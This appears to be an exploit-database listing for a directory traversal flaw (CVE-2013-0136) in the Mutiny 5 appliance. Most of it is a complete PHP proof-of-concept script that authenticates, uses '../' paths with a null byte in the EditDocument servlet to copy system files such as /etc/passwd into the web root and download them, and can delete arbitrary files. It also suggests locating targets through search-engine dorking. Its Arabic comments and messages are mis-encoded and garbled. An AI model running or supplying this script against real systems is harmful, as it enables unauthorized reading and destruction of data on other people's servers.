Share
## https://sploitus.com/exploit?id=PACKETSTORM:214910
=============================================================================================================================================
    | # Title     : Mutiny 5.0-1.07 directory traversal Vulnerability                                                                           |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.mutiny.com/downloads/                                                                                           |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking ฤฐn Google Or Other Search Enggine.
    
    [+] Code Description: The code is an exploit written in PHP that targets a vulnerability in the Mutiny 5 Appliance, 
    
        allowing an authenticated attacker (i.e. with a username and password) to read or delete any file on the system due to a Directory Traversal vulnerability in the EditDocument servlet.
       
       (Related : https://packetstorm.news/files/id/180894/ Linked CVE numbers:	CVE-2013-0136 ) .
    	
    [+] save code as poc.php.
    
    [+] Set taget : Line 110.
    
    [+] USage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    
    class MutinyExploit {
        private $target;
        private $username;
        private $password;
        private $session;
    
        public function __construct($target, $username, $password) {
            $this->target = rtrim($target, '/');
            $this->username = $username;
            $this->password = $password;
        }
    
        private function sendRequest($url, $postFields = null, $cookie = null) {
            $ch = curl_init($url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    
            if ($postFields) {
                curl_setopt($ch, CURLOPT_POST, true);
                curl_setopt($ch, CURLOPT_POSTFIELDS, $postFields);
            }
    
            if ($cookie) {
                curl_setopt($ch, CURLOPT_HTTPHEADER, ["Cookie: $cookie"]);
            }
    
            $response = curl_exec($ch);
            curl_close($ch);
            return $response;
        }
    
        public function login() {
            // ุงู„ุญุตูˆู„ ุนู„ู‰ JSESSIONID ุงู„ุฃูˆู„ูŠ
            $response = $this->sendRequest("{$this->target}/interface/index.do");
            if (preg_match('/JSESSIONID=(.*?);/', $response, $matches)) {
                $firstSession = $matches[1];
            } else {
                die("ูุดู„ ููŠ ุงู„ุญุตูˆู„ ุนู„ู‰ JSESSIONID ุงู„ุฃูˆู„ูŠ\n");
            }
    
            // ู…ุญุงูˆู„ุฉ ุชุณุฌูŠู„ ุงู„ุฏุฎูˆู„
            $postFields = "j_username={$this->username}&j_password={$this->password}";
            $response = $this->sendRequest("{$this->target}/interface/j_security_check", $postFields, "JSESSIONID=$firstSession");
    
            // ุงู„ุชุญู‚ู‚ ู…ู…ุง ุฅุฐุง ูƒุงู† ุชุณุฌูŠู„ ุงู„ุฏุฎูˆู„ ู†ุงุฌุญู‹ุง
            if (strpos($response, "interface/index.do") === false) {
                die("ูุดู„ ุชุณุฌูŠู„ ุงู„ุฏุฎูˆู„ุŒ ุชุญู‚ู‚ ู…ู† ุจูŠุงู†ุงุช ุงู„ุงุนุชู…ุงุฏ\n");
            }
    
            // ุงู„ุญุตูˆู„ ุนู„ู‰ JSESSIONID ุงู„ู†ู‡ุงุฆูŠ ุจุนุฏ ุงู„ู…ุตุงุฏู‚ุฉ
            $response = $this->sendRequest("{$this->target}/interface/index.do", null, "JSESSIONID=$firstSession");
            if (preg_match('/JSESSIONID=(.*?);/', $response, $matches)) {
                $this->session = $matches[1];
                echo "ุชู… ุชุณุฌูŠู„ ุงู„ุฏุฎูˆู„ ุจู†ุฌุงุญ\n";
            } else {
                die("ูุดู„ ููŠ ุงู„ุญุตูˆู„ ุนู„ู‰ ุงู„ุฌู„ุณุฉ ุจุนุฏ ุชุณุฌูŠู„ ุงู„ุฏุฎูˆู„\n");
            }
        }
    
        public function readFile($filePath) {
            echo "ู†ุณุฎ ุงู„ู…ู„ู ุฅู„ู‰ ู…ูˆู‚ุน ูˆูŠุจ ูŠู…ูƒู† ุงู„ูˆุตูˆู„ ุฅู„ูŠู‡...\n";
            $dstPath = "/usr/jakarta/tomcat/webapps/ROOT/m/";
            $postFields = [
                'operation' => 'COPY',
                'paths[]' => "../../../../{$filePath}%00.txt",
                'newPath' => "../../../..{$dstPath}"
            ];
    
            $response = $this->sendRequest("{$this->target}/interface/EditDocument", $postFields, "JSESSIONID={$this->session}");
            if (strpos($response, '{"success":true}') !== false) {
                echo "ุชู… ู†ุณุฎ ุงู„ู…ู„ู ุฅู„ู‰ {$dstPath} ุจู†ุฌุงุญ\n";
            } else {
                die("ูุดู„ ููŠ ู†ุณุฎ ุงู„ู…ู„ู\n");
            }
    
            // ู‚ุฑุงุกุฉ ุงู„ู…ู„ู
            echo "ุงุณุชุฑุฌุงุน ู…ุญุชูˆู‰ ุงู„ู…ู„ู...\n";
            $fileContents = $this->sendRequest("{$this->target}/m/" . basename($filePath));
            if ($fileContents) {
                file_put_contents("extracted_" . basename($filePath), $fileContents);
                echo "ุชู… ุงุณุชุฑุฌุงุน ุงู„ู…ู„ู ูˆุญูุธู‡ ู…ุญู„ูŠู‹ุง\n";
            } else {
                echo "ูุดู„ ููŠ ุงุณุชุฑุฌุงุน ู…ุญุชูˆู‰ ุงู„ู…ู„ู\n";
            }
    
            // ุชู†ุธูŠู ุงู„ู…ู„ูุงุช ุจุนุฏ ุงู„ู‚ุฑุงุกุฉ
            $this->deleteFile("{$dstPath}" . basename($filePath));
        }
    
        public function deleteFile($filePath) {
            echo "ุญุฐู ุงู„ู…ู„ู {$filePath}\n";
            $postFields = [
                'operation' => 'DELETE',
                'paths[]' => "../../../../{$filePath}"
            ];
    
            $response = $this->sendRequest("{$this->target}/interface/EditDocument", $postFields, "JSESSIONID={$this->session}");
            if (strpos($response, '{"success":true}') !== false) {
                echo "ุชู… ุญุฐู ุงู„ู…ู„ู ุจู†ุฌุงุญ\n";
            } else {
                echo "ูุดู„ ููŠ ุญุฐู ุงู„ู…ู„ู\n";
            }
        }
    }
    
    // ุงุณุชุฎุฏุงู… ุงู„ูƒูˆุฏ
    $exploit = new MutinyExploit("http://target.com", "superadmin@mutiny.com", "password");
    $exploit->login();
    $exploit->readFile("/etc/passwd"); // ู…ุซุงู„ ุนู„ู‰ ู‚ุฑุงุกุฉ ู…ู„ู
    // $exploit->deleteFile("/tmp/test.txt"); // ุญุฐู ู…ู„ู (ุงุฎุชูŠุงุฑูŠ)
    
    ?>
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================